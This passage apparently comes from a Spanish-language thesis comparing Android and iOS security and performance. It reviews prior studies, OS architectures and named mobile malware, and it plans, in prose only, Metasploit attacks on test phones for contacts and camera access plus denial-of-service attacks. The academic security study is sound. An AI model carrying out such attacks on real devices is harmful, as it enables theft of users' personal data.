dispositivos móviles.

Para las víctimas, si se trata de un usuario común, puede causarse daño moral

aparte de robo de dinero, debido a que se guarda información personal en los

teléfonos móviles. Si se trata de una empresa podrían perderse miles de dólares,

dependiendo de la empresa, por lo que la información para cada usuario tiene un

valor elevado.

A continuación en el Gráfico N° 1, se observa el crecimiento exponencial de

ataques en Android debido al elevado crecimiento en el mercado; resultados

obtenidos por Kaspersky Lab (Morelo & Betancur, 2013). Hay un gran número de

malware que atacan y roban información a estos dispositivos móviles; de igual

forma que crece el sistema operativo también crecen los ataques.

7

Elaboración: (Morelo & Betancur, 2013, p. 6)

Fuente: (Morelo & Betancur, 2013, p. 6)

El grafico N°1, detalla a Android como el sistema líder para el cual se crean

malware (código malicioso, cuyo objetivo es dañar un sistema) con un 98.96%,

seguido por J2ME con un 0.97%, en tercer lugar, está Symbian con un 0.04% y

los demás con un 0.03%.

Por otro lado, (Durán, Peinado, & Rosado, 2015), denota las molestias que causa

a los usuarios en cuanto al rendimiento de las aplicaciones que presentan sus

teléfonos; el resultado del 96% de usuarios destaca qué tan importante es para

ellos el desempeño en los dispositivos.

Mediante un estudio realizado por Apigee (2012), se obtuvo que el 96% de los

usuarios manifestaban frustración cuando encuentran problemas como:

aplicaciones congeladas, capacidad de respuesta lenta, excesivo uso de batería

y cantidad exagerada de publicidad (Durán et al., 2015, p. 85).

Las personas y empresas poseen dispositivos móviles de bajo rendimiento

cotidianamente por falta del conocimiento en el uso correcto de la plataforma y por

GRÁFICO N° 1

ESTADÍSTICA DE CREACIÓN DE MALWARE PARA SISTEMAS

8

CUADRO N° 1

CAUSAS, CONSECUENCIAS DEL PROBLEMA

escuchar hipótesis de sus amigos, familiares e incluso por el marketing de las

marcas que venden teléfonos móviles.

Una de las consecuencias es adquirir un teléfono móvil que no alcance el

rendimiento ofrecido por el modelo elegido; desde otro punto de vista no se

explotaría al máximo la eficiencia del sistema operativo que posee el dispositivo,

aunque sea con una capacidad elevada.

Causas, consecuencias del problema

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Falta de conocimiento de medidas de

seguridad que ofrece el sistema

operativo.

Víctima de cualquier ataque de la

informacion.

Adquirir un teléfono de gama baja.

Los sistemas operativos móviles no

alcanzan a cubrir todos los pilares de la

seguridad.

No prestar la debida atención a los

accesos de recursos de las

aplicaciones que ofrecen los

dispositivos móviles en la tienda.

Escuchar a personas de criterios

hipotéticos.

Daño Moral, por el robo de

información personal, por personas

mal intencionadas.

Perder la disponibilidad e integridad

de los datos almacenados en el

teléfono.

No utilizar correctamente la plataforma

que ofrece el teléfono inteligente.

No aprovechar al máximo la

tecnología móvil.

Acceder a páginas web inseguras.Pérdida de dinero de empresas y

personas.

Causas Consecuencias

9

Delimitación del problema

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Formulación del Problema

¿Mediante el análisis comparativo de seguridad de la información y rendimiento

de los sistemas operativos Android e iOS, se podrá brindar al usuario una guía de

recomendaciones que le permitan seleccionar entre las dos plataformas y

establecer los beneficios de éstas?

Evaluación del problema.

Para la evaluación del problema se plantean seis aspectos tales como: Delimitado,

Claro, Evidente, Concreto, Relevante y Factible. Los cuales se ajustan al problema

de la investigación de este proyecto a continuación se justifica cada uno de ellos:

Delimitación: Las personas y empresas debido a la popularidad de los teléfonos

inteligentes se ven afectadas en la seguridad de la información; los

ciberdelincuentes buscan aprovechar las vulnerabilidades de Android e iOS para

apoderarse de información que les interese y sacar provecho más que todo en lo

Campo

Área Seguridad en Tecnología Móvil.

Dispositivos Móviles

Establecer los beneficios que ofrecen los sistemas

operativos: Android e iOS, en teléfonos móviles, mediante el

análisis comparativo de seguridad de la información y

rendimiento para brindar al usuario una guía de

recomendaciones.

Análisis comparativo en términos de seguridad de la

información y rendimiento entre sistemas operativos Android

e iOS en teléfonos móviles.

Aspecto

Tema

CUADRO N° 2

DELIMITACIÓN DEL PROBLEMA

10

económico e incluso en espionaje de información personal, tentando contra la

moral del usuario.

Las nuevas versiones de teléfonos móviles tanto de Android como iOS va

aumentando en un tiempo acelerado, se implementan nuevas características

incluso muy similares a las anteriores que logran enganchar a los usuarios. Estos

alcances que logra la tecnología ocurren porque en muchas ocasiones los

usuarios no tienen el conocimiento necesario para diferenciar el rendimiento que

van a brindar los sistemas operativos en el momento de adquirir un teléfono móvil.

Claro: Debido al avance tecnológico de los dispositivos móviles de Android e iOS,

la seguridad de la información y rendimiento se ven afectados, ya sea por ataques

informáticos a vulnerabilidades que no han cubierto por completo tanto Google

como Apple y por la falta de conocimiento del correcto uso de las plataforma tanto

en las configuraciones de seguridad como en el verdadero desempeño de las

nuevas versiones de teléfonos móviles. Cabe mencionar que se corren estos

riesgos, ya que conforme la tecnología avanza los ciberdelincuentes buscan la

manera de hacer caer tanto a Android como a iOS en la seguridad que brindan los

dispositivos.

Evidente: Es innegable decir que en la actualidad los sistemas operativos Android

e IOS son los que lideran el mercado de los dispositivos móviles, ya que las

personas desde los niños hasta ancianos poseen un teléfono móvil; por lo que los

ciberdelincuentes han aprovechado este mercado para robar dinero accediendo a

la información; en cuanto al rendimiento obtenemos un teléfono que no

explotamos al máximo sus recursos.

Es claro que los ciberdelincuentes están siempre realizando ataques para

encontrar las vulnerabilidades a las nuevas versiones de teléfonos móviles tanto

Android como iOS porque la tecnología cada día va en aumento; en rendimiento

los usuarios también van a estar adquiriendo nuevos teléfonos móviles por las

características que ofrecen las marcas o por recomendaciones de personas.

Concreto: Los usuarios en cualquier parte del mundo están en riesgo de algún

ataque informático por los agujeros existentes en la seguridad de la información

11

en los sistemas operativos Android e iOS; y por falta de conocimiento del uso

correcto de la plataforma pueden adquirir un teléfono de gama baja y no

aprovechar al máximo el rendimiento que brindan los dispositivos móviles.

Relevante: La seguridad de la información de los sistemas operativos más

grandes del mercado de teléfonos móviles no pueden cubrir todos los pilares

fundamentales de la seguridad de la información en la actualidad, ya que mientras

van desapareciendo vulnerabilidades de los sistemas operativos van apareciendo

más de éstas e incluso nuevas, conforme va aumentando esta tecnología; en

cuanto al rendimiento siguen siendo notorias las fallas por el mal uso del teléfono

por parte de los usuarios ya que no tienen una guía de recomendaciones referente

a este tema.

Factible: Es posible reducir el problema de seguridad de la información, pero no

resolverlo debido a que mientras avanza la tecnología también lo harán los

ciberdelincuentes en contra de la seguridad de los teléfonos móviles. Aprovechar

el rendimiento de los teléfonos móviles no es posible, ya que actualmente no

existen guías que brinden los beneficios de los sistemas operativos ya sea de

Android e iOS.

OBJETIVOS DE LA INVESTIGACIÓN

Objetivo general

Establecer los beneficios y limitaciones que ofrecen los sistemas operativos:

Android e iOS, en teléfonos móviles, mediante el análisis comparativo de

seguridad de la información y rendimiento para brindar al usuario una guía de

recomendaciones que le permita seleccionar entre las dos plataformas.

Objetivos específicos

✓ Analizar, las ventajas y desventajas de cada sistema operativo mediante

herramientas de seguridad informática.

12

✓ Comparar el rendimiento de los sistemas operativos Android e iOS, en

varias versiones de teléfonos móviles, desde cierta aplicación en común

para las dos plataformas.

✓ Plantear al usuario una guía, de los resultados obtenidos en el estudio

comparativo mediante el análisis cualitativo.

ALCANCES DEL PROBLEMA

En el proyecto se analizarán los dos sistemas operativos Android e iOS, en seis

teléfonos inteligentes.

✓ Se tomarán dos teléfonos móviles con características comunes uno de

cada plataforma en que se realizarán ataques en la seguridad de la

información.

✓ Se tomarán seis teléfonos, tres de cada sistema operativo, donde se

medirá el tiempo de ejecución que demore la aplicación que analiza el

rendimiento; para determinar las diferencias de los sistemas operativos

móviles en el término a estudiar.

✓ Se establecerán los beneficios y limitaciones que ofrece cada sistema

operativo de los dos términos a estudiar, para que los usuarios tengan una

guía de recomendaciones y puedan seleccionar la plataforma correcta al

momento de adquirir un teléfono móvil.

JUSTIFICACIÓN E IMPORTANCIA

(Rodríguez & Quimí, 2016) “Los dispositivos móviles seguirán creciendo, junto a

sus características, capacidades y posibilidades de utilización, lo que hace

necesario evaluar la seguridad que se ofrecen a estos dispositivos.”

13

El estudio de análisis comparativo en los sistemas operativos Android e IOS, se

realiza porque los usuarios dicen es mejor usar tal dispositivo, sin saber la

verdadera razón de por qué utilizan ese teléfono.

Una de las razones más importantes de realizar el análisis comparativo, es para

determinar qué sistema operativo brinda mayor seguridad de la información y

mejor rendimiento de las diversas versiones de teléfonos móviles.

Es importante porque se rompería la interrogante de qué sistema operativo es

mejor y daríamos a conocer los beneficios de cada uno de éstos; facilitando la

elección de la plataforma de cada teléfono móvil que utilice el usuario.

Metodología del proyecto

Se utilizará la metodología de análisis cualitativo y cuantitativo para conocer y

medir el grado de exposición de seguridad de la información y rendimiento en

Android e iOS de teléfonos móviles.

Se analizarán los términos de seguridad de la información y rendimiento de cada

sistema operativo, para elaborar una guía como recomendación, que ayude a los

usuarios a la toma de decisiones en el momento de adquirir un teléfono móvil.

14

CAPITULO II

MARCO TEÓRICO

ANTECEDENTES DEL ESTUDIO

“Tecnología y desarrollo en dispositivos móviles -

seguridad en dispositivos móviles.”

Material docente de la UOC elaborado por Josep Prieto Blázquez, Robert Ramírez

Vlque, Julian David Morillo Pozo y Marc Domingo Prieto docentes de la

Universidad Oberta de Catalunya en España, finalizado el año 2011.

La elaboración de este módulo tiene como fin no ser un manual de seguridad ni

recoger todos los riesgos que existen, sino para introducir conceptos básicos de

seguridad y que familiarice a usuarios con los riesgos expuestos; debido al avance

de la tecnología inalámbrica en dispositivos móviles.

Fuente: Google Scholar (Prieto et al., 2011)

“Sistemas operativos móviles: funcionalidad, efectividad y

aplicaciones útiles en Colombia”

Proyecto de grado elaborado por Sanly Aponte Gómez y Carlos Dávila Ramírez

estudiantes de la Universidad EAN – Facultad de Ingeniería en Sistemas en

Bogotá, en el año 2011.

La elaboración de este proyecto de grado tiene como objetivo analizar los sistemas

operativos móviles más utilizados en la actualidad, sus funcionalidades,

efectividad para poner en práctica lo aprendido referente al tema, para que los

usuarios puedan tener el conocimiento necesario para aprovechar al máximo la

plataforma y aprovechar la seguridad que brinda el teléfono móvil. (Aponte &

Dávila, 2011)

15

Fuente: Repositorio de la universidad EAN – Biblioteca Hildebrando Perico

Afanador (Aponte & Dávila, 2011)

“Características y parámetros de la seguridad para los

smartphones con sistema operativo Android”

Proyecto de grado elaborado por Rubén Darío Osorio Herrada y Carlos Alberto

Ramirez Herrera estudiantes de la Universidad Tecnológica de Pereira – Facultad

de ingenierías - Programa de ingeniería en sistemas computacionales, en el año

2011

La elaboración de este proyecto tiene como objetivo desarrollar una monografía

que considere las principales características y parámetros de la seguridad en

transmisión de datos para los Smartphones con sistema operativo Android; con el

fin de brindar conocimiento a los usuarios de las crecientes amenazas de malware

que puede ocurrir en los dispositivos móviles y recomienda aplicaciones que

brinden seguridad en su plataforma. (Osorio & Ramírez, 2011)

Fuente: Repositorio de la Universidad Tecnológica de Pereira (Osorio & Ramírez,

2011)

“Seguridad en dispositivos móviles con sistemas

operativos Android y iOS”

Artículo investigativo elaborado por Juan Carlos Albarracín Galindo, Leidy Maribel

Parra Camargo y Juan José Camargo Vera, estudiantes de la Universidad

Pedagógica y Tecnológica de Colombia – Escuela de Ingeniería en Sistema

Computacionales; en la ciudad de Tunja – Colombia, en el año 2013

Este artículo presenta una perspectiva de análisis de los aspectos relevantes

relacionados con la seguridad en los dispositivos móviles con sistemas operativos

Android y IOS. Fue elaborado para determinar los mecanismos de seguridad que

se pueden implementar por el usuario, con el fin de minimizar los posibles riesgos

16

presentes en el momento de uso de los dispositivos móviles. (Albarracín et al.,

2013, p. 51)

En el artículo mencionan un estudio donde nos confirman que existen resultados

donde indican que iOS es el sistema operativo de mayor cantidad de

vulnerabilidades frente a Android en los teléfonos móviles.

La empresa de seguridad en su informe Internet Security Threat Report 2013,

menciona respecto a las vulnerabilidades de seguridad en los teléfonos móviles

durante el año 2012; que el sistema operativo iOS tiene mayor número de

vulnerabilidades que Android en ese año. (Albarracín et al., 2013, p. 51)

Con el estudio realizado, la utilización de smathphone con fines de negocio

incrementa de forma acelerada día a día, debido a la información almacenada,

surge la motivación de los ciberdelincuentes para realizar ataques informáticos y

obtener información de los usuarios. Por eso da a conocer a los usuarios los

peligros y riesgos que están expuestos en los dispositivos. También recomienda

a los usuarios de Colombia acoger las medidas necesarias cuando realicen

actividades cotidianas para aprovechar al máximo las facilidades que ofrecen sin

poner en riesgo la información. Y concluye que Android es el sistema operativo

con mayor incidencia de ataques informáticos, por tal motivo aconseja a estos

usuarios prestar atención a los mecanismos existentes de seguridad, verificar los

permisos de las aplicaciones que se instala; para prevenir ataques Troyanos SMS

y utilizar anti-virus.

Fuente: Repositorio Los Libertadores (Albarracín et al., 2013)

“Metodología para la selección de herramientas eficientes

y protocolos adecuados para mejorar la seguridad de los

dispositivos móviles”

Proyecto de magister elaborado por Ing. Daysi Mireya Erreyes Pinzón, estudiante

de la Universidad de Cuenca – Facultad de Ingeniería – Maestría en Gestión

17

Estratégica de Tecnologías de la Información; en la ciudad de Cuenca – Ecuador

en el año 2017.

El desarrollo de la investigación tiene como objetivo, diseñar una metodología para

la selección de herramientas eficientes y protocolos adecuados para mejorar la

seguridad de los dispositivos móviles. La que permitirá a los usuarios y

profesionales dedicados a la protección de información, disponer de una guía

práctica que les permita seleccionar herramientas válidas y puedan mejorar su

nivel de protección de la información contenida en sus dispositivos móviles.

(Erreyes, 2017)

Fuente: (Erreyes, 2017)

FUNDAMENTACIÓN TEÓRICA

Sistema operativo

Definiciones

(Aponte & Dávila, 2011), afirma que “Un sistema operativo (SO) es el software

básico de una computadora que provee una interfaz entre el resto de los

programas del computador, los dispositivos hardware y el usuario.” (p. 20)

El sistema operativo es el componente encargado de gestionar los recursos del

ordenador, así como los programas instalados en este. De esta forma nos permite

utilizar el software de una manera cómoda y gestionar más adecuadamente los

recursos del hardware. (Correa, 2014, p. 27)

Se confirma que, un sistema operativo móvil, es un sistema encargado de

monitorizar un dispositivo móvil de la misma manera de los sistemas operativos

de un pc de escritorio, laptop, etc. Los sistemas operativos móviles son sencillos

en comparación a las computadoras porque están dirigidos comúnmente a la

18

conectividad inalámbrica, la configuración multimedia y la forma de alojar

información en ellos. (Aponte & Dávila, 2011)

Tipos de sistemas operativos móviles

Los tipos de sistemas operativos móviles según (Correa, 2014) son: Symbian,

Blackberry OS, Windows Mobile, Android e IOS.

Se escribe una definición breve de éstos, pero nos centraremos en Android e iOS

porque son los que vamos a estudiar en el análisis ya que estos están en la

actualidad liderando el mercado de dispositivos móviles.

Symbian

Es un SO exclusivo para celulares, creado por una alianza entre varias empresas

de telefonía celular en las que se encuentra: Nokia, Sony Ericsson, Panasonic,

Motorola, PSION, LG, Samsung, Siemens, Arima, Beng, Sharp, Fujitsu, Lenovo,

Mitsubishi Electric, entre otros. Está basado en su predecesor el sistema EPOC3,

el cual fue utilizado en Handhelds y PDA’s. (Correa, 2014, p. 34)

BlackBerry Os

Es un sistema operativo móvil creado por Reseach In Motion (RIM) para sus

dispositivos BlackBerry. Es un sistema que permite multitarea y tolera diferentes

métodos de entrada adoptados por RIM para su uso en computadora de mano,

como son trackball (bola de desplazamiento). (Bermúdez & López, 2011, p. 30)

Windows Mobile

Es un sistema operativo móvil desarrollado por Microsoft, y diseñado para su uso

en smartphone y otros dispositivos móviles. Es basado en el núcleo del sistema

operativo Windows CE y cuenta con un conjunto de aplicaciones básicas

19

utilizando las API de Microsoft Windows. Su diseño es similar a las versiones de

escritorio de Windows estéticamente. (Correa, 2014, p. 39)

Android

Es una plataforma completa de código abierto diseñado para dispositivos móviles.

Es promovido por Google y pertenece a Open Handset Alliance. El objetivo de

alianza es “acelerar la innovación en los consumidores móviles y ofrecen una rica,

menos costosa, y mejor experiencia móvil”. Como tal Android está revolucionando

el espacio móvil. Por primera vez es una verdadera plataforma abierta que separa

del hardware del software que se ejecutan en él. (Carvajal & Sasig, 2012, p. 45)

Para el estudio de este proyecto se utilizará tres teléfonos móviles inteligentes con

sistemas operativos Android, de versión 5.1.1, versión 6.0.1 y versión 7.0

Características

Según (Albarracín et al., 2013) las características relevantes de Android son:

✓ El frameword de aplicaciones que permite el reemplazo y la reutilización

de los componentes.

✓ El navegador integrado el cual está basado en el motor de open Source

Webkit; SQLite base de datos para almacenamiento estructurado que se

integra directamente con las aplicaciones.

✓ El soporte para medios con formatos comunes de audio, video e imágenes

planas; máquina virtual Dalvik entre otras. (p. 46)

20

Arquitectura de Android

Elaboración: (Correa, 2014)

Fuente: (Correa, 2014)

APLICACIONES

“Las cuales se incluye como base un cliente email, programa de SMS,

calendario, mapas, navegador, contactos y otros. Todas escritas en lenguaje de

programación Java.“ (Albarracín et al., 2013, p. 46)

FRAMEWORK DE APLICACIONES

“Los desarrolladores de Android, tienen acceso al código fuente usando en

aquellas que son base, esto para que no se generen más componentes distintos

GRÁFICO N° 2

ARQUITECTURA DE ANDROID

21

que respondan a la misma acción (reutilización de componentes.)“ (Albarracín

et al., 2013, p. 46)

LIBRERÍAS

Android incluye en su base de datos un set de librerías C/C++, que son

representadas a todos los desarrolladores a través del frameword de las

aplicaciones. Algunas son System C Library, bibliotecas de medios, bibliotecas de

gráficos, 3D y SQLite, entre otras. (Albarracín et al., 2013, p. 46)

RUNTIME DE ANDROID

Incorpora un set de librerías que aportan la mayor parte de las funcionalidades

disponibles en las librerías base del lenguaje de programación Java. Cada

aplicación Android corre su propio proceso con su propia instancia de la máquina

virtual Dalvik. Dalvik ejecuta archivos en el formato Dalvik Ejecutable (.dex), el cual

está optimizado para memoria mínima. (Albarracín et al., 2013, p. 46)

NÚCLEO LINUX

Android depende de Linux para los servicios base del sistema como seguridad,

gestión de memoria, gestión de proceso, pila de red y modelo de controladores.

Este además actúa como una capa de abstracción entre el hardware y el resto de

la pila de software. (Albarracín et al., 2013, p. 46)

iOS

Es un sistema operativo de código cerrado, orientado a equipos de escritorio que

ha sido reinventado para dispositivos móviles. Ya que está basado en el sistema

operativo informático más avanzado del mundo, OS X iOS representa un rápido

desempeño y una estabilidad muy sólida. (Correa, 2014, p. 43)

Desarrollado por Apple Inc, inicialmente solo para el teléfono inteligente de la

compañía (iPhone), luego fue extendido a otros dispositivos como el iPod Touch,

iPad y el Apple TV. Se deriva de Mac OS X, el cual está basado en Darwin BSD.

(Albarracín et al., 2013, p. 47)

22

Para el desarrollo de este proyecto, se utilizará tres teléfonos inteligentes con

sistema operativo iOS de versión 10.3.3, versión 11.0.2 y versión 11.1.2

Características.

Las principales características según (Albarracín et al., 2013) son:

INTERFAZ DE USUARIO

Se basa en el concepto de manipulación mediante gestos multi-touch. Los

elementos de esta se componen por deslizadores, interruptores y botones. La

respuesta es inmediata y fluida en las aplicaciones. La interacción con el sistema

operativo se realiza mediante movimientos como deslizar y tocar. (Albarracín

et al., 2013, p. 47)

SPRINGBOARD

Es la pantalla principal donde se ubican los iconos de Aplicaciones y el Dock en

la parte inferior de la pantalla se puede anclar aplicaciones de uso frecuente.

(Albarracín et al., 2013, p. 47)

APLICACIONES

iOS incluye múltiples aplicaciones entre las que se destacan : phone (video

conferencia y teléfono), email, safari (navegador web), mensajes, calendarios,

fotos, cámara, iTunes, App Store (Tienda de aplicaciones), Nike + iPod, Siri

(asistente por control de voz), entre otras.(Albarracín et al., 2013, p. 47)

SOPORTE MULTITAREA

El sistema operativo permite la ejecución de aplicaciones en segundo plano,

permitiendo la posibilidad de usar varias a la vez (Albarracín et al., 2013, p. 47)

23

GRÁFICO N° 3

ARQUITECTURA DE IOS

Arquitectura de iOS

“iOS cuenta con cuatro capas de abstracción: el núcleo del sistema operativo, los

“Servicios Principales”, los “Medios” y “Cocoa Touch”. “(Albarracín et al., 2013, p.

47)

Se basa en capas, en donde las más altas se encargan de contener las

tecnologías y servicios de mayor importancia para el desarrollo de las

aplicaciones; los servicios básicos son controlados por las más bajas. (Albarracín

et al., 2013, p. 48)

Elaboración: (Blanco, Camarero, Fumero, Werterski, & Rodríguez, 2009, p. 26)

Fuente: (Blanco et al., 2009, p. 26)

COCOA TOUCH

Es la capa de mayor relevancia en el desarrollo de aplicaciones para este sistema

operativo, basándose en un conjunto de Frameworks proporcionados por el API

de Cocoa; en donde se destacan: Ulkit encargado de contener todas las clases

24

que son necesarias para el desarrollo de una interfaz de usuario y Foundation que

definen algunos servicios del sistema operativo. (Albarracín et al., 2013, p. 48)

MEDIA

“Se proveen los servicios gráficos y multimedia. ”(Albarracín et al., 2013, p. 48)

CORE SERVICES

“Domina los servicios fundamentales necesarios para la ejecución de las

aplicaciones.” (Albarracín et al., 2013, p. 48)

CORE OS

“Constituye las características de bajo nivel, como lo son: drivers, manejo de

memoria, seguridad ficheros del sistema.” (Albarracín et al., 2013, p. 48)

Conceptos básicos de seguridad

Se necesita conocer conceptos básicos de seguridad porque el tema está

enfocado en este término importante que brinda los teléfonos móviles.

Según (Prieto et al., 2011) define los conceptos a continuación:

Confidencialidad

Es la propiedad que asegura que solo los que están automatizados tendrán

acceso a la información. Esta propiedad también se conoce como privacidad.

(Prieto et al., 2011, p. 7)

Integridad

Es la propiedad que asegura la no alteración de la información. Por alteración

entendemos cualquier acción de inserción, borrado o sustituido de la información.

(Prieto et al., 2011, p. 7)

25

Disponibilidad

Es la confirmación que todos los usuarios autorizados tengan acceso a la

información y activos relacionados cuando se requiera.(Salellas, 2017)

Autentificación

Es la propiedad que hace referencia a la identificación. Es el nexo de unión entre

la información y su emisor. (Prieto et al., 2011, p. 7)

El no repudio

Es la propiedad que asegura que ninguna parte pueda negar ningún compromiso

o acción realizados anteriormente. (Prieto et al., 2011, p. 7)

Dispositivo móvil.

Un dispositivo móvil, es todo aquel aparato que puede contener información, tenga

un sistema operativo y haga la función en particular en la que se necesita

almacenar, consultar y manipular información que se encuentre en él y que

además sea portable y de un tamaño muy reducido.(Correa, 2014, p. 23)

Tipos de dispositivos móviles.

Teléfono móvil.

(Baz, Ferreira, Álvarez, & García, 2011) afirmó que “El teléfono móvil es un

dispositivo inalámbrico electrónico basado en la tecnología de ondas de radio,

que tiene la misma funcionalidad que cualquier teléfono de línea.”

26

Asistente Digital Personal.

Según (Albarracín et al., 2013, p. 48), “son agendas personales electrónicas que

se caracterizan por su capacidad para el almacenamiento de datos, lo anterior

debido a que poseen la cantidad de memoria necesaria para esta función.”

Teléfono móvil inteligente (SmartPhone)

Este tipo de dispositivos se presentan actualmente como los más ligeros,

portables y cómodos, la principal función que cumplen es la de realizar y recibir

llamadas; adicionalmente los “Smartphone” se hacen cada vez más atractivos

para los usuarios, debido a que permiten la instalación y ejecución de aplicaciones,

de gran utilidad para los compradores, entre las más relevantes se pueden

encontrar cámara fotográfica, grabación de video, gestor de correos electrónicos,

chats, redes sociales, GPS, navegador web entre otros. (Albarracín et al., 2013,

p. 49)

Para el estudio de este proyecto, se utilizarán seis teléfonos móviles inteligentes,

el Samsung Galaxy J5, Samsung Galaxy J7, Samsung Galaxy 8 Plus, iPhone 5,

iPhone 6 y iPhone 7.

Capas de seguridad en dispositivos móviles

✓ Hardware potente, con muchos sensores.

✓ Un sistema operativo complejo que facilita un SDK sencillo y potente para

los desarrolladores.

✓ Un mercado de aplicaciones completamente integrado en el sistema y muy

intuitivo, lo que facilita las transacciones tanto a los usuarios como a los

desarrolladores.(Prieto et al., 2011, p. 8)

Ataques

(Erreyes, 2017) define al ataque como un acto deliberado que se produce cuando

se intenta provocar un daño en un sistema específico; cualquier tipo de ataque

constituye una amenaza a la seguridad informática, sin dejar a un lado los casos

27

en los que el daño se produce de forma accidental por ejemplo los fallos en el

hardware, costes en la energía eléctrica, tormentas eléctricas, incendios y otros

desastres naturales. (p. 19)

Hay diversos tipos de ataques informáticos según (Erreyes, 2017) entre los más

importantes:

Ataques Pasivos que se producen por: ataque de intermediario (man in the

middle); Ataques Activos, ocasionados por: eliminación, modificación suplantación

Interceptación; Ataques combinado (hacker, cracker, ciberdelito), virus, worms,

troyanos, spyware, malware, rootkis. (Erreyes, 2017, p. 19)

Ataques y amenazas en Android e iOS

Según (Prieto et al., 2011) las principales amenazas que existen en el ámbito del

sistema operativo son causadas por errores en el aislamiento de los recursos ya

sea debido a sus diseños, a errores en el software o a una mala configuración de

sus servicios.

Ejemplo del ataque:

En ciertas circunstancias, un proceso podría modificar los parámetros ya

verificados por otro proceso, pero que este todavía no ha utilizado. Las

consecuencias de tal ataque son imprevisibles, ya que el proceso realizará

operaciones utilizando parámetros para los que no ha sido diseñado.(Prieto

et al., 2011, p. 19)

Estas vulnerabilidades pueden ser aprovechadas para ejecutar ataques tantos

desde los servicios que ofrece el propio sistema operativo, como desde la capa

de aplicaciones.(Prieto et al., 2011, p. 19)

Si el ataque se realiza sobre un servicio del sistema operativo, sus consecuencias

dependerán de la vulnerabilidad expuesta. (Prieto et al., 2011, p. 19)

28

Principales Ataques contra Android

Troyanos SMS

(SMS - AndroidOS.Optake.bo,

SMS - AndroidOS.Fakelnst.a,

SMS - AndroidOS.Agent.a,

SMS - AndroidOS.Plangton.a,

SMS - AndroidOS.Opfake.a y

SMS - AndroidOS.Fakeview)

Generalmente funcionan de la siguiente forma: como primera medida el usuario

descarga el malware inadvertidamente, posteriormente el Troyano envía un SMS

a un numero de Premiun, sin el consentimiento de la víctima, el SMS es

transportado a través de la red de la compañía de telefonía prestada de la

plataforma SMS, en donde el código malicioso bloquea los mensajes de

confirmación para finalmente que el cibercriminal genere ganancias ilícitas

mediante el aprovechamiento de la cuenta del usuario. (Albarracín et al., 2013, pp.

50-51)

Adware

Su ejecución es automática y tiene como objetivo fundamental el mostrar

publicidad. Se ocultan en programas ofrecidos gratuitamente que incluyen dentro

de sus condiciones de uso, que generalmente no son leídas por el usuario, en

donde se acepta que se ejecuten las funciones que muestra dicha publicidad.

(Albarracín et al., 2013, p. 51)

29

Exploits

Son programas que se han diseñado para sacar provecho de las vulnerabilidades

de un software, representados por:

(Exploit-AndroidOS.Lotoor.g,

Exploit-AndroidOS.Lotoor.c y

Exploit-AndroidOS.Lotoor.p) de los ataques a estas plataformas; en la mayoría de

ocasiones estos ataques se realizan con fines maliciosos. Estas vulnerabilidades

no son más que errores en la programación, que pueden ser aprovechados como

puerta de entrada de ataques. (Albarracín et al., 2013, p. 51)

En este proyecto se realizará ataques Exploit, para vulnerar la confidencialidad

desde un computador con la herramienta metasploit.

En este proyecto se realizará en Android un ataque exploit, mediante metasploit

se creará un virus que adquiera los permisos, para acceder a contactos, mensajes,

imágenes y cámara web,

Ataques en iOS.

Según (Albarracín et al., 2013) los ataque más conocidos que se realizan en iOS

son:

Iphone Exploit Code

Básicamente el ataque consiste en colocar el computador del ataque a través del

metasploit como un webserver a la escucha de solicitudes de conexión

proveniente de los móviles navegando por internet. Cuando la víctima acceda al

webserver, el navegador Safari se cerrará automáticamente, el usuario, podrá

abrirlo nuevamente y continuar utilizando, sin embargo en el equipo del atacante

se tendrá un Shell remoto con permisos privilegiados sobre el sistema pudiendo

acceder a los correos configurados en el equipo, a los archivos de sistema a fin

de modificar los archivos host o dns. (Albarracín et al., 2013, p. 52)

30

Ikee.Co: Malware.iPhoneOS/Ikee,C@SSH+Otros

Gusano que afecta a móviles iPhone que utilicen la contraseña por defecto del

root en el servicio SSH del teléfono, únicamente afecta a terminales a los que se

le ha practicado el “jail-break”. Cambia la imagen de fondo del terminal. Cuando

se ejecuta, detiene remotamente el demonio SSH y elimina el inicio automático en

la opción de reinicio el servicio SSH. (Albarracín et al., 2013, p. 52)

Ikee.Bo: Malware.iPhoneOS/Ikee.B@SSH+Otros

Gusano que se propaga al dispositivo iPhone que han sido modificados, para

permitir la instalación de software oficial. Consiste en el robo información sensible,

bloquea la pantalla y muestra el siguiente texto.” El iPhone ha sido hackeado

porque es realmente inseguro”, y solicita el pago de 5 euros para la liberación del

dispositivo y, además modifica la contraseña del usuario root. (Albarracín et al.,

2013, p. 52)

Aurora Feint

Este fue un juego lanzado para la plataforma, su manera de atacar era subiendo

los datos de los contactos almacenados en la librería de directorios a la base de

datos del desarrollador y ocupa estos datos para enviar spam. (Albarracín et al.,

2013, p. 52)

Ataques D.O.S. y de Apam en iOS iMessages app

Estos ataques consisten en la denegación de servicios haciendo imposible abrir

la aplicación iMessages para leer los mensajes y dejando inutilizado el servicio.

(Albarracín et al., 2013, p. 52)

En este proyecto en el capítulo 3, se realizará ataques D.O.S, y se denegará el

servicio a páginas web que la víctima acceda.

31

Phishing

Este ataque tiene como objetivo intentar obtener sus datos, claves cuentas

bancarias, números de tarjeta de crédito, identidades para luego ser usados de

forma fraudulenta; puede producirse de varias formas, desde un mensaje, una

ventana emergente, y la más usada y reconocida por los internautas, la recepción

de un correo electrónico. (Albarracín et al., 2013, p. 52)

Cross-site scripting (XSS)

Es una vulnerabilidad que aprovecha la falta de mecanismo de filtrado en los

campos de entrada y permiten el ingreso y envío de datos sin validación alguna,

aceptando el envío de scripts completo. (Albarracín et al., 2013, p. 53)

URL spoofing

Este tipo de ataque consiste en mostrar una dirección URL falsa en la barra de

direcciones de Safari el navegador por defecto de iOS, permitiendo incluso tomar

información de la tarjeta de crédito cuando se realizan compras en la tienda de

Apple. (Albarracín et al., 2013, p. 53)

FUNDAMENTACIÓN LEGAL

El proyecto de investigación está protegido por el COIP (Código Orgánico Integral

Penal) de la ley en la República del Ecuador.

Las sanciones se encuentran en los siguientes artículos ubicados en el:

32

Capítulo tercero “Delitos contra los Derechos del Buen

Vivir”

Sección tercera “Delitos contra la seguridad de los activos

de los sistemas de información y comunicación”

Artículo 229.- Revelación ilegal de base de datos.- Las personas que, en

provecho propio o de un tercero, revele información registrada, contenida en

ficheros, archivos, bases de datos o medios semejantes, a través o dirigidas a

un sistema electrónico, informático, telemático o de telecomunicaciones;

materializando voluntaria e intencionalmente la violación del secreto, la

intimidad y la privacidad de las personas, será sancionada con pena privada de

uno a tres años.(Asamblea Nacional Registro Oficial, 2014, p. 36)

